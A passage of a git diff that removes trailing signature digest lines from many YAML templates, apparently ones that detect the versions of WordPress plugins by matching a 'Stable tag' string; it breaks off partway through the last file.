a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 156e9fb895..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b9ee718bc1d1adb0b584a6151052316e8452507fc8631f341d26426a0132209022100c8465d6e86add951d552ef045e9c9e8a74ba2d109958c1f169b28c8c2f4a952d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 416e2adb19..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2b45078209678d3f4742653a71d7a613d8fc82aaa99ca7ffdfb0f40da8f2b4102203fe8314bba765ceec84ea4f8102309f267ebd8ee33101f15cac27a82b4dc3281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 8913c1ec97..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d10f2375d01346005767a63ecb5bbf6510b6e3f8d07a89507c7dee9420a8d5d9022100f49c55b3b41d1fc2b514f1faad28a8ca5a1416c8c4b5ceb03ad0a3ca55362797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 5af4be6099..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220345ec511f0175a1706ebdf75061d0482b1ede4df90a5f1dd3f8dde707d771b1002202f7e457b8920c6b48bf818be03c19c1048c3f16daa4f25501585f6a488c70bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 8e5753c822..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1544474a19c073f30d73257a3bdfc3a5f7174fb4ccb0f6b89c0a1983cc7f278022100f5f5da3538c04d763d26e47ff69d06907b3041df7909d7eb2b15ae990db108d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index f1e92fef67..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207db5fcd4562bbca084b06c3d777dcd6f9e911ab04cfcfd1585f2779d1ad2831d022100c779c6dc9130c5ba962ff20f5fc3c2544df8ecacf06436945e0e07d6f4bfaa85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index af61acda27..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e0b20bc0c255a775f1a257f3f8a8610aa65ab067795c23a90dd577e9ff58f4402206507f7801813f470f00e1cd1409e3e2a4f2f3599067f1b63f571d46bfbd1c8bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 53a1556bc8..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a2707e6143fae0e5dadfb372f26972a3906612a9d533294ecd37e65491155b4f022100d7458990437e988dbee0875eea63a5ea5705422c12e15c3ee0d90a0cc52b6a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 347f8ce057..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f426ef438b93fa4bc631aeb152827f6d7f615d4d5a064dc3b914bd79b4c376610221009295713379eab9a0ae2069e145267df47d20f84d09b8dd1c4a47d612c4e435fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 48d64ce445..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030b371191f5ecf62ca85593605763f497df821b7b8cd7278db592a40e6ac807702202c297db38f86f536e96e0344aed9c81824c34216baabc30aa9e1c762a9aa437b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index c93271f0b7..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c822c8fd6ed4cebd06879aabb13165041f0be06a7581f4a944bf79747d515b2c022100dba3015f5476b563db8f7678a7d8e15554de20a8406076e17636277858cfba8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 7dbff53615..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056af6671177a7d4431ceb839e968b50b0ac3f132e59355fd843d6c1a86cbae0f022003575b7f16d2794c055603c24b6f55521bddb9d09607de052aeb8a90783bf006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index ee116c3650..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e2cd8ed81bbc1c0d4f57b839e2ee1d7d6ea81b7c4cbdbffb65c36a026f9bf7f022100cf9e5e2bca70ad3c1b86dd56f86f0ad180a712495010db5a4caa29f55756175a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 3b3f8ba153..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031361a48ce4f18439a271c9d0023773bfe8e2ca3de7d01a4db94ba3aa67d0054022000e9daf25efd09f629b39f8e1d557e86963fd9733cc3120a6a26be2e745261a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 2dd206874a..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022072ca4788ad590df01ae3cadd55cd527a9ef97530564c7c7765f69410f6b3708a022023ca38714a63c5796ce67a4c6cf1516d32aa65719356a4fad3ceef13cd24f7bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 0ff26345f4..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008bd5e45bd9e024e7e7ffc075533cae17f8b1ac1c0bf242695304eef5e8b86f6d022100d7ecde48f73c1a467b02cfbc7b99a102590fc75d86dc18d8a6b477d106a2e0fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index dccf83db5f..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022015eeb258e65c1eb64453597d1f402721b55f8ec003dfeb4569c58bfe1a92e620022100f7fcf715a9be2627e6a0238d3f4e9bca4ae2bdc905a5ae103a895029bae1aedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index ad074200b0..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a2953f0314001fede1a7c99349cd258fe330122180143f739355d3c8141b3c9022053d5841d4d5c57a467b531792bf1ee33eeb7ea52ee9461e9004bf11c3aef4957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index df0c459085..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5f13976bb2f70e2c3cc5e4992929147f14a49dc73e187c38dc47cdd58485f73022065f3fb22c73053983c836ca7a97aaaa29227884fe2a3fd7ddc4f783b8ca73b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1573c9c072..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0d63944a95769426d1254b4621b34602e755af624ca85cfc6b447173ce30dea022063cc7452e558e942e6ea694506bf6dde1b6fd654d538d8abfc1aa8ebca5e4555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c1808612be..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ab62a61733ca4f90ad09de580a896375314e894a0da6c6f2fcf6b0b59878b8f022100a3aa0d1398caf0065ab7a56f313e390fbc940a427d98509a8b8089a3bf84a61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6359c2178d..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220502e06eba17e921053a62746a2fa0ad3ce3e9f2999690d9f04d98b28c97124a7022100decae809da204d4c7a45e98ccfc19c29616f34f57bc80c7006da37f7906d4312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 4caf47d2af..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220525e087f0e45a0870c2ef9cb6e401112a6ff29cf80c71a002748ddec380dc668022076ee78dce72514621c729553ed6b3c1a2de2e224315abfaebfee824b1ebfa611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index bc8d851bd0..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022003d1419a067c721539e550f56c01cca1c91b348eea1077d375f9e8059844dddf022100ce5e82afa3338512470f96c9e852181e5477ed32d835cce355b89aaa789c8cad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 38840df0a3..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd3467afa6a3448921ecccf41ee7e056305fd0d07e1dd53915543311ad7138510220570459b1d291d511360b1dc13afbddc64cc2c36f56b8e8c756a3d3c4d598fc23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 6c47a02e89..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8b39944dc797eea6b528572fd3dff6e8a14796baa1bc10ed7c5c90d409c3614022100b97210d4a98d79681923aea3ebb64edd180d47cce24e474b33f412d309973262:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a841bf80b5..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220382e2d04ac93657214b796362085de1c7d4d2d2e003057feb9b608093a8777ba02207b2892bf63a2de429b352abf90cf97e7372261b2546c45ee7765a2de9382e456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index fde6fcf574..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8d8cee82df7c0b1cebc473eeab01ae4671afe2c387d74857c65e6f5fdcd165602205bead162f7aa88e2180eff222f5ced37b75c3acd66c85330a0e8ca6099018201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 49f16a90ea..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220016e3678774f9d7a128c5a9ad61b39ae663c9d25813c652b1ce5d1a89a5a39a0022100a6a7d80289f7c85f52137be3d2ad98c59b470b47f1a71a1f4d61ea4a078873f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index b6e668bb0c..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cca8f198ca9135b83d9019278e77824a30884ebfcb00a603bd1b0ab64e961ae9022100adaccfb7a34eec109a637ef2444616d68701e3878dff581648ccfd02aa0a9329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 4d9f504b8b..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220332172adb0ee7cba49e14077ffff9d9d4b6e61fc44aee6007a29ba63256fcb1c022073de631518c3fd8e811ddc4cbf56e44e6abc20c430d4ad62f307ba69e99aeab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 1e595e0ad3..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa91f34467e6102fc87f4432dfa50b3abab05d58485ee3a595b82bb1c200c86c02202f59642a41e4535c8250b503595e65bb6055de77d80a7706a01b9ca70d1a2419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index af1e927c7d..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202b5cb8e0492890527241e6921bab1bda5cdd8f123aa2cd21cb05ab7631125d10022019c9469dc39d3c28cdd6a79cdb43142c8e48a7e05671d0e2b1c5195386a33049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index cde0ad2446..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204160782ad88fc260ab40dc3dae0bde2207a7c3cd850e889710bdacffc6eb8f6b022100acdd96db6b79da79890d8e8fc63272a87c49741977eb453df1d48d71a5b46a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 3c13570954..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d34c288b20f177c3c9b3c1c1a6bf7f60bfcbe9885c738ca4369ec537faf168ac022100986eb7216c1e9567a729468c85d508800dcfba5a76fe9f9c46b4e7e4070d9c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 0feffa39bf..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf9d639f8c00fa5f0970636db98458657bfc02f7b08769991b75fe3cc6ea4ad402201c60476fa4bc5ea0fff486faa9f14b09cb11b38de146b6a8e2fd2de718e119c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 543c65d689..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3943c8a7cfd89c49bbd57af28dc87a6710ec212b21e2bcc5f9eb5a9b76d069202202832c6d8fca3a46e068aeeeecf6bf0400619940316d9424481e1f59fdd583cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 6fbe83523b..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a89b94d95980253ac7a12fe3cb052d928ca2de530b7705e7c206bf25038c612d022100bbc4a5081511d9ebdd36fb1396d1732153cc377b872dc167b3a3dbc83be07f41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 63244b3805..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ceec9db04511ad79c95275648a762c98947c685bfeaf0c0279e42270ee9c63c022100efd32b2ab6aaf5836004a866d23f946e965e7da9e6e968232a106c52cf53e93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 642a67f119..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203edbd49a2d911642b262eb06efbc5fe4268f942a39e2ac23aaa901bf58bd43bf022100883ac6b29673b4b3e3aca98a6db4cdc3ffea04fa6781184d9ca190fcf8fb213e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 815e01c861..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100959e7f4a39717aabb315cbd8a988afeb41f6706ecd4c318607da438b1a9b9dd102206104249d7270d6354c4cc7aa4f8d7aa877ed23ae2cfdce7b37bf8facc58b4f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 21900d3088..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203641c8d46e6557b6d88a36c7553814346c3dd29e40e28a4548e9116de237929702210082735b10ccbf5b38a83bc3e2d26899a680f69c8b4db071432e76bc9d73cf2804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 5f2ff6c8b9..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ff41408696489d8a3f60f356e4f742477749b2fe0c83742e40e84b2ffc777a9022039463fc1ef93c291ad1216d5a65f82fbd93a25de11ab2c1c66f31ac506f68861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 468a7796f9..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae31043e3253cd41868f79b4095b01f2ef71da2f958f501ea1c6893447705c28022100b40ac5c899a2e70ebe588af931d36d611be1b4091b9a381f89c642b4fb0eb7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index b823b539ef..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022044967a7995def79279f552385710b6a1575254712205aa51255ffd6e8dfad08f0221009d5b2526099a432a180e50afa047520c2b49ce6e2abe38c02497b594a9de48db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 62866cca58..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045706cb3873781e54ba78423e162f3f91b5995e572d4189b597da2a2a725e7650221008dabcb23978cb5e255490d351eaad89449f78e2e99abffd49e1488a7867e5c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 0c878fc937..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 